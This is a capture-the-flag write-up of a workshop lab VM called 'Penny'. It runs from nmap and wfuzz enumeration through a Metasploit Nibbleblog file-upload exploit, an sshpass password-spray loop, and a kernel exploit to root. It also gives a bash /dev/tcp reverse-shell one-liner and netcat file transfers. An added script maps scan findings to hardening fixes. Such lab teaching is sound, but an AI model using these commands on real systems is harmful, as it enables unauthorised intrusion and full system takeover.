Pentesting: Penny
Write-up for the Pentesting4Ever workshop at Navaja Negra 2019, machine Penny.
Thanks to Nacho and the NavajaNegra2019 organisers
Contents:
- Starting and configuring the machine to audit: Penny
- 1.1.1) Port enumeration: nmap (simple)
- 1.1.2) Port enumeration 2 (nmap option -sC)
- Port enumeration: information obtained
- 1.2) Enumeration: vulnerabilities 1 (nmap -script *vuln*)
- 1.3) Enumeration: services (nmap -script *enum*)
- Enumeration: vulnerabilities and services: information obtained
- 1.3.1) Enumeration: ftp
- 1.3.2) http enumeration: directory search
- 1.3.3) http re-enumeration (nibbleblog)
- 2.1) Exploiting nibbleblog: getting a username/password
- 2.2) Exploiting nibbleblog: getting a shell (using Metasploit)
- 2.3) Exploiting nibbleblog: getting a shell (without Metasploit): finding nibbleblog vulnerabilities
- 2.4) Exploiting ssh: getting a username/password (by hand) (without Metasploit)
Starting and configuring the machine to audit, Penny, in VirtualBox
Note: I configure the network as a host-only adapter.
My VMs' network is 192.168.56.XX
(this may be different on your machine; check with: ip a | grep global)
em50l@jejo.es$ ip a |grep vbox
inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0
Then I run nmap -sn 192.168.56.1/24
or nmap -sn 192.168.56.*
to see what shows up:
jejo@em50l:~$ nmap -sn 192.168.56.1/24 -T4
Nmap scan report for 192.168.56.104
Host is up (0.00093s latency).
In my case the machine's IP is 192.168.56.104
1) Enumeration
1.1.1) Port enumeration: nmap (simple)
jejo@em50l:~$ nmap -n 192.168.56.104
Nmap scan report for 192.168.56.104
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
1.1.2) Port enumeration 2 (nmap option -sC)
jejo@em50l:~$ nmap -n 192.168.56.104 -sC -p 21,22,80,139,445
Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-07 23:11 CEST
Nmap scan report for 192.168.56.104
PORT    STATE SERVICE
21/tcp  open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Sep 29 18:17 cms
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh
| ssh-hostkey:
|   2048 e6:0e:5d:ec:a3:0f:09:1e:bc:a8:11:8f:f5:b7:02:ae (RSA)
|   256 bf:cb:b4:ee:b8:91:e8:25:04:00:94:b4:24:34:3f:d1 (ECDSA)
|_  256 57:4a:70:3c:e9:54:2b:61:16:bf:ea:34:c8:52:5b:7b (EdDSA)
80/tcp  open  http
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
|_nbstat: NetBIOS name: UBUNTU-16, NetBIOS user:, NetBIOS MAC: (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: ubuntu-16
|   NetBIOS computer name: UBUNTU-16\x00
|   Domain name: 04.3-server-amd64
|   FQDN: ubuntu-16.04.3-server-amd64
|_  System time: 2019-10-07T23:11:13+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-07 23:11:13
|_  start_date: 1600-12-31 23:45:16
Information obtained:
- 21 anonymous FTP, vsFTPd 3.0.3
- 22 ssh
- 80 Apache2 Ubuntu
- Samba 4.3.11-Ubuntu
- Computer name: ubuntu-16
1.2) Enumeration: vulnerabilities 1 (nmap -script *vuln*)
jejo@em50l:~$ nmap -n 192.168.56.104 -p 21,22,80,139,445 -script *vuln*
Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-08 00:01 CEST
Nmap scan report for 192.168.56.104

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_
Information obtained:
- regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service
A DoS attack is of no use to us, so we move on.
1.3) Enumeration: services (nmap -script *enum*)
jejo@em50l:~$ nmap -n 192.168.56.104 -p 21,22,80,139,445 -script *enum*
Nmap scan report for 192.168.56.104
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
| ssh2-enum-algos:
|   kex_algorithms: (6)
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       ssh-rsa
|       rsa-sha2-512
|       rsa-sha2-256
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:E3:86:CA (Oracle VirtualBox virtual NIC)

Host script results:
|_msrpc-enum: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-enum-domains:
|   UBUNTU-16
|     Groups: n/a
|     Users: n/a
|     Creation time: unknown
|     Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|     Account lockout disabled
|   Builtin
|     Groups: n/a
|     Users: n/a
|     Creation time: unknown
|     Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|_    Account lockout disabled
| smb-enum-sessions:
|_
| smb-enum-shares:
|   account_used: guest
|   \\192.168.56.104\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (ubuntu-16 server (Samba, Ubuntu))
|     Users: 5
|     Max Users:
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.56.104\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users:
|     Path: C:\var\lib\samba\printers
|     Anonymous access:
|_    Current user access:
| smb-mbenum:
|   DFS Root
|     UBUNTU-16  0.0  ubuntu-16 server (Samba, Ubuntu)
|   Master Browser
|     UBUNTU-16  0.0  ubuntu-16 server (Samba, Ubuntu)
|   Print server
|     UBUNTU-16  0.0  ubuntu-16 server (Samba, Ubuntu)
|   Server
|     UBUNTU-16  0.0  ubuntu-16 server (Samba, Ubuntu)
|   Server service
|     UBUNTU-16  0.0  ubuntu-16 server (Samba, Ubuntu)
|   Unix server
|     UBUNTU-16  0.0  ubuntu-16 server (Samba, Ubuntu)
|   Windows NT/2000/XP/2003 server
|     UBUNTU-16  0.0  ubuntu-16 server (Samba, Ubuntu)
|   Workstation
|_    UBUNTU-16  0.0  ubuntu-16 server (Samba, Ubuntu)
Information obtained:
- Nothing worth noting. We move on.
1.3.1) Enumeration: ftp
Manual mode: timeout 1 cat < /dev/tcp/192.168.56.104/21
or: timeout 1 telnet 192.168.56.104 21
em50l@jejo.es$ timeout 1 cat </dev/tcp/192.168.56.104/21
220 (vsFTPd 3.0.3)
Using nmap: nmap 192.168.56.104 -sC -p 21
jejo@em50l:~$ nmap 192.168.56.104 -sC -p 21
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Sep 29 18:17 cms
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
vsFTPd 3.0.3
and... !!! Anonymous FTP login allowed !!!
Good, so I connect to the ftp as anonymous: mc ftp://192.168.56.104
I use mc (Midnight Commander) to browse faster.
I see a file called .cmspass.bk
jejo@em50l:~$ curl ftp://192.168.56.104/.cmspass.bk
Recordatorio YmlnYmFuZ3RoZW9yeTIwMTg=
Careful, the line breaks are misleading.
It looks like base64-encoded text. (You will learn to recognise them: upper and lower case letters, no spaces, ending in an equals sign.)
Let's see what it hides: curl -s ftp://192.168.56.104/.cmspass.bk | base64 -d
jejo@em50l:~$ curl -s ftp://192.168.56.104/.cmspass.bk |base64 -d
bigbangtheory2018
Information obtained: bigbangtheory2018
It looks like a password.
1.3.1) Possible vsFTPd exploits: searchsploit vsFTPd
root@kali:~# searchsploit vsFTPd
------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                 |  Path
                                                                               | (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                 | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                 | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                 | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                               | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                         | exploits/unix/remote/17491.rb
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Nothing for vsFTPd 3.0.3
1.3.2) http enumeration
Manual mode: curl -kvs http://192.168.56.104 | grep server
root@kali:/tmp# curl -kvs http://192.168.56.104 | grep server
* Connected to 192.168.56.104 (192.168.56.104) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.56.104
> User-Agent: curl/7.64.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Wed, 25 Sep 2019 13:13:24 GMT
1.3.2) Possible exploits for Apache/2.4.18 (Ubuntu)
searchsploit Apache2 2.4
https://duckduckgo.com/html/?q=exploit-db%20apache2%202.4
root@kali:/tmp# searchsploit Apache2 2.4
------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                 |  Path
                                                                               | (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Esc | exploits/linux/local/46676.php
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
It looks like something could be had here.
But since for now I cannot place PHP files on the server, it is of no use to me.
I will have to try it later on.
:( no results :(
1.3.2) http enumeration: directory search.
1.3.2a) http enumeration with Metasploit: scanner/http/dir_scanner (no results)
root@kali:~# msfconsole
[-] starting tHe Metasploit Framework console...-
msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.56.104
rhosts => 192.168.56.104
msf5 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.56.104
[+] Found http://192.168.56.104:80/icons/ 403 (192.168.56.104)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
:( no results :(
1.3.2b) http enumeration with dirb (no results)
root@kali:~# dirb http://192.168.56.104

DIRB v2.22
By The Dark Raver
-----------------

URL_BASE: http://192.168.56.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WORDS: 4612

-----------------
---- Scanning URL: http://192.168.56.104/ ----
+ http://192.168.56.104/index.html (CODE:200|SIZE:11321)
+ http://192.168.56.104/server-status (CODE:403|SIZE:279)

-----------------
END_TIME: Tue Oct 8 17:22:27 2019
DOWNLOADED: 4612 - FOUND: 2
:( no results :(
dirb using a larger wordlist (no results)
root@kali:~# dirb http://192.168.56.104/ /usr/share/dirb/wordlists/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Oct 22 16:07:19 2019
URL_BASE: http://192.168.56.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.56.104/ ----
+ http://192.168.56.104/server-status (CODE:403|SIZE:279)

-----------------
END_TIME: Tue Oct 22 16:08:13 2019
DOWNLOADED: 20458 - FOUND: 1
:( no results :(
1.3.2c) http enumeration with wfuzz (no results)
root@kali:~# wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt --hc 404 "http://192.168.56.104/FUZZ"
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.104/FUZZ
Total requests: 45463

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

Total time: 87.05434
Processed Requests: 45463
Filtered Requests: 45463
Requests/sec.: 522.2369
:( no results :(
1.3.2d) http enumeration with wfuzz, brute-force style (combining 2 words) !!! At last I find something !!!
root@kali:~# wfuzz -c -s 0.01 -w /usr/share/wfuzz/wordlist/general/megabeast.txt -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 "http://192.168.56.104/FUZZFUZ2Z"
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.104/FUZZFUZ2Z
Total requests: 43189850

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

21049726:  C=301      9 L       28 W      321 Ch        "nibble-blog"
At last I find something: nibbleblog
http://192.168.56.104/nibbleblog
Although it took far too long (more than 24h).
1.3.3) http re-enumeration (nibbleblog)
Once I have found a path, I search again:
root@kali:~# wfuzz -c -w /usr/share/wfuzz/wordlist/general/admin-panels.txt --hc 404 "http://192.168.56.104/nibbleblog/FUZZ"
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.104/nibbleblog/FUZZ
Total requests: 137

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000001:  C=200     26 L       94 W     1410 Ch        "admin.php"
000002:  C=200     22 L      126 W     2130 Ch        "admin/"
In this case I think dirb gives me clearer information.
root@kali:~# dirb http://192.168.56.104/nibbleblog /usr/share/dirb/wordlists/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

URL_BASE: http://192.168.56.104/nibbleblog/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.56.104/nibbleblog/ ----
+ http://192.168.56.104/nibbleblog/README (CODE:200|SIZE:4628)
==> DIRECTORY: http://192.168.56.104/nibbleblog/admin/
==> DIRECTORY: http://192.168.56.104/nibbleblog/content/
==> DIRECTORY: http://192.168.56.104/nibbleblog/languages/
==> DIRECTORY: http://192.168.56.104/nibbleblog/plugins/
==> DIRECTORY: http://192.168.56.104/nibbleblog/themes/

---- Entering directory: http://192.168.56.104/nibbleblog/admin/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.

---- Entering directory: http://192.168.56.104/nibbleblog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.

---- Entering directory: http://192.168.56.104/nibbleblog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.

---- Entering directory: http://192.168.56.104/nibbleblog/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.104/nibbleblog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Fri Oct 11 01:37:18 2019
DOWNLOADED: 20458 - FOUND: 1
root@kali:~# wfuzz -c -s 0.01 -w /usr/share/wfuzz/wordlist/general/common.txt -w /usr/share/wfuzz/wordlist/general/extensions_common.txt --hc 404 "http://192.168.56.104/nibbleblog/FUZZFUZ2Z"
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.104/nibbleblog/FUZZFUZ2Z
Total requests: 26600

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

001671:  C=200     26 L       94 W     1410 Ch        "admin - .php"
001680:  C=200     22 L      126 W     2130 Ch        "admin - /"
006328:  C=200     18 L       82 W     1356 Ch        "content - /"
012255:  C=200    182 L      765 W     9693 Ch        "index - .php"
012591:  C=200      0 L       11 W       78 Ch        "install - .php"
021551:  C=200     18 L       21 W      688 Ch        "sitemap - .php"
024183:  C=200     87 L      175 W     1628 Ch        "update - .php"

Total time: 317.1319
Processed Requests: 26600
Filtered Requests: 26593
Requests/sec.: 83.87675
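The enumeration above (the nmap -sC results in 1.1.2 and the dirb results here) surfaces several weak settings that the owner of this box would want to fix. As an added example, not part of the original write-up, the following script reads that scanner output and turns each weak setting into a finding with the configuration change that closes it; the function names and the constructed sample lines (copied from the outputs shown above) are my own.

```shell
#!/bin/bash
# Added example: triage nmap -sC / dirb output for weak configurations.
# Reads scanner output on stdin, prints one finding per weak setting.
# The matched strings are the exact phrases nmap and dirb print above.

triage_enum_output() {
    local line last_dir=""
    while IFS= read -r line; do
        case "$line" in
            *"Anonymous FTP login allowed"*)
                echo "FTP-ANON: anonymous login enabled; set anonymous_enable=NO in vsftpd.conf" ;;
            *"Control connection is plain text"*)
                echo "FTP-PLAINTEXT: credentials cross the wire unencrypted; require TLS (ssl_enable=YES) or retire FTP" ;;
            *"message_signing: disabled"*)
                echo "SMB-SIGNING: signing off; set 'server signing = mandatory' in smb.conf" ;;
            *"Anonymous access: READ/WRITE"*)
                echo "SMB-GUEST-WRITE: guest can write to a share; set 'guest ok = no' and 'writable = no'" ;;
            *"Entering directory: "*)
                # dirb prints the directory on one line and the warning on the next,
                # so remember the directory to report it with the warning.
                last_dir=${line#*Entering directory: }
                last_dir=${last_dir%% *} ;;
            *"Directory IS LISTABLE"*)
                echo "HTTP-INDEX: listing enabled on ${last_dir:-unknown}; add 'Options -Indexes' to the vhost" ;;
        esac
    done
}

# Constructed sample: lines lifted from the nmap and dirb output in the write-up.
SAMPLE_ENUM_OUTPUT='21/tcp  open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|      Control connection is plain text
|_  message_signing: disabled (dangerous, but default)
|     Anonymous access: READ/WRITE
---- Entering directory: http://192.168.56.104/nibbleblog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.'

# Run the triage over the sample (live use: nmap -sC ... | triage_enum_output).
triage_sample() {
    printf '%s\n' "$SAMPLE_ENUM_OUTPUT" | triage_enum_output
}

# Number of findings in the sample; expected: 5.
count_sample_findings() {
    triage_sample | wc -l | tr -d ' '
}

triage_sample
```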
2) Exploitation
2.1) Exploiting nibbleblog: getting a username/password
Browsing the directory structure I come across: http://192.168.56.104/nibbleblog/content/private/users.xml
And here I find that one user is: penny
Remember that a possible password was bigbangtheory2018
Other interesting URLs:
http://192.168.56.104/nibbleblog/content/private/config.xml
http://192.168.56.104/nibbleblog/content/public/upload/
http://192.168.56.104/nibbleblog/update.php
I get the version info: Nibbleblog 4.0.3 Coffee
In the end, after several tries, the user is penny and the password is OrgulloFriki
2.2) Exploiting nibbleblog: getting a shell (using Metasploit)
- Start the console: msfconsole
- Search for exploits: search nibbleblog
msf5 > search nibbleblog

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   1  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability
- Load the exploit: use exploit/multi/http/nibbleblog_file_upload
- Show the options: show options
msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload) > show options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the web application
   USERNAME                    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3
- Set the exploit parameters
msf5 exploit(multi/http/nibbleblog_file_upload) > set rhosts 192.168.56.104
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set username penny
msf5 exploit(multi/http/nibbleblog_file_upload) > set password OrgulloFriki
msf5 exploit(multi/http/nibbleblog_file_upload) > set lhost 192.168.56.105
msf5 exploit(multi/http/nibbleblog_file_upload) >
- Launch it and get a meterpreter
msf5 exploit(multi/http/nibbleblog_file_upload) > run

[*] Started reverse TCP handler on 192.168.56.105:4444
[*] Sending stage (38247 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.104:52336) at 2019-10-23 16:59:07 -0400
[+] Deleted image.php

meterpreter >
meterpreter > sysinfo
Computer    : ubuntu-16
OS          : Linux ubuntu-16 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64
Meterpreter : php/linux
- Launch a somewhat more complete shell from meterpreter
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
meterpreter > shell
Process 2477 created.
Channel 2 created.
python -c 'import pty;pty.spawn("/bin/bash")'
</html/nibbleblog/content/private/plugins/my_image$
2.3) Exploiting nibbleblog: getting a shell (without Metasploit): finding nibbleblog vulnerabilities
Logging into the blog as penny, under settings I see it is a:
Nibbleblog 4.0.3 "Coffee"
Searching the internet for: Nibbleblog 4.0.3 vuln :
https://duckduckgo.com/html?q=Nibbleblog%204.0.3%20vuln
An article comes up discussing the vulnerability: CVE-2015-6967
https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html
http://192.168.56.104/nibbleblog/content/private/plugins/my_image/image.php?cmd=id
To be completed:
2.4) Exploiting ssh: getting a username/password (by hand, haha)
We assume the user is penny and the password is a word from the web page.
I build a wordlist from the site's content:
cewl http://192.168.56.104/nibbleblog/ > diccionario_nibbleblog.txt
I ssh in, trying the words of the wordlist as the password:
root@kali:~# cat ./diccionario_nibbleblog.txt | while read pass ; do ( echo $pass ; sshpass -p $pass ssh -q penny@192.168.56.104 ); done
Big
Bang
Theory
Sheldon
Penny
divertidos
Leonard
Series
Geek
OrgulloFriki
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-87-generic x86_64)
As you can see, the password is OrgulloFriki
For more info see the miscellaneous notes
3) Privilege escalation.
3.1) Linux kernel vulnerabilities.
- I enumerate the kernel:
uname -a
penny@ubuntu-16:/tmp$ uname -a
Linux ubuntu-16 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
I look for exploits:
exploit-db Linux ubuntu-16 4.4
https://duckduckgo.com/html/?q=exploit-db%20Linux%20ubuntu-16%204.4
I compile the exploit:
I download the code: wget https://www.exploit-db.com/exploits/44298
I prepare the .c file:
nano exploitKernel.c
Is there a gcc compiler on the target machine??? gcc
:( !!! oh NO, it has no compiler !!!
I compile the code: gcc exploitKernel.c
Careful: if the target machine is a different architecture you will have to cross-compile.
I copy the exploit to the target:
sshpass -p 'OrgulloFriki' scp ./a.out penny@192.168.56.104:/tmp/
I run the exploit:
chmod +x /tmp/a.out ; /tmp/a.out
penny@ubuntu-16:~$ chmod +x /tmp/a.out ; /tmp/a.out
task_struct = ffff880004e00000
uidptr = ffff88002b368904
spawning root shell
root@ubuntu-16:~#
root@ubuntu-16:~# id
uid=0(root) gid=0(root) grupos=0(root),1001(penny)
Root access obtained.
!!! here is the flag !!!
root@ubuntu-16:~# cat /root/root.txt
#####################################################
Oh yeah! you got to be root!!
Congralutations
Training Pentesting4ever - Navaja Negra 9ed
#####################################################
3.2) Linux kernel vulnerabilities (searchsploit)
- I enumerate the kernel:
uname -a
penny@ubuntu-16:/tmp$ uname -m
x86_64
penny@ubuntu-16:/tmp$ uname -a
Linux ubuntu-16 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
- I look for exploits:
searchsploit ubuntu 16 4.4.0
root@kali:/tmp# searchsploit ubuntu 16 4.4.0
------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                 |  Path
                                                                               | (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Pr | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Boun | exploits/linux_x86-64/local/40049.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation         | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local P | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Es | exploits/linux/local/43418.c
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
- I compile the exploit:
root@kali:/tmp# uname -m
i686
root@kali:/tmp# gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i686-linux-gnu/8/lto-wrapper
Target: i686-linux-gnu
This is a problem: my Kali is no use for compiling this exploit.
I have to cross-compile.
** ;( no results ;( **
3.3) mysql (no results)
Not seeing the mysql port from outside
does not mean there is no mysql.
penny@ubuntu-16:/tmp$ mysql --version
mysql  Ver 14.14 Distrib 5.7.27, for Linux (x86_64) using  EditLine wrapper
root@kali:/tmp# searchsploit mysql 5.7
------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                 |  Path
                                                                               | (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege  | exploits/linux/local/40360.txt
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege  | exploits/linux/local/40678.c
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' System User Privilege E | exploits/linux/local/40679.sh
MySQL < 5.6.35 / < 5.7.17 - Integer Overflow                                   | exploits/multiple/dos/41954.py
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:/tmp# scp /usr/share/exploitdb/exploits/linux/local/40679.sh penny@192.168.56.104:/tmp/
penny@192.168.56.104's password:
40679.sh                                      100% 6303    40.8KB/s   00:00
https://duckduckgo.com/html/?q=exploit-db%20mysql%205.7%20Privilege
https://www.exploit-db.com/exploits/40679
penny@ubuntu-16:/tmp$ ./exploit_mysql.bash /var/log/mysql/error.log
MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit
mysql-chowned.sh (ver. 1.0)
CVE-2016-6664 / OCVE-2016-5617
Discovered and coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit as uid=1001(penny) gid=1001(penny) grupos=1001(penny)
[!] You need to execute the exploit as mysql user! Exiting.
** ;( no results ;( **
3.4) http: possible exploits for Apache/2.4.18 (no results)
I upload the PHP exploit found earlier, exploits/linux/local/46676.php,
and request the URL:
http://192.168.56.104/nibbleblog/content/private/plugins/my_image/image.php?cmd=id
It returns:
CARPE (DIEM) ~ CVE-2019-0211
The following addresses were not determined by parsing /proc/self/maps: shm, apache
** ;( no results ;( **
3.2) Other methods.
Miscellaneous notes:
Reverse shell
Here is an excellent reverse shell cheat sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/
Let's try a bash shell:
- Machine to control: bash -i >& /dev/tcp/192.168.56.105/80 0>&1
- Controlling machine: nc -nvlp 80
Example:
- Source machine (kali): (ip a |grep global) ; nc -nvlp 80
root@kali:~# (ip a |grep global) ; nc -nvlp 80
inet 192.168.56.105/24 brd 192.168.56.255 scope global dynamic noprefixroute eth0
listening on [any] 80 ...
The machine waits for an incoming connection,
and as soon as I run bash -i >& /dev/tcp/192.168.56.105/80 0>&1
on the target machine,
a connection is made and we will see this:
connect to [192.168.56.105] from (UNKNOWN) [192.168.56.104] 54726
penny@ubuntu-16:/tmp$
Which means I now have access to the target machine.
Copying a file using netcat:
- Source machine: nc -w 3 ip.dest 1234 < LinEnum.sh
- Target machine: nc -l -p 1234 > LinEnum.sh
Copying a file over http:
- Source machine: python3 -m http.server
- Target machine: wget http://192.168.56.105:8000/LinEnum.sh
Example:
- Source machine (kali): (ip a |grep global) ; python3 -m http.server
root@kali:~# (ip a |grep global) ; python3 -m http.server
inet 192.168.56.105/24 brd 192.168.56.255 scope global dynamic noprefixroute eth0
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
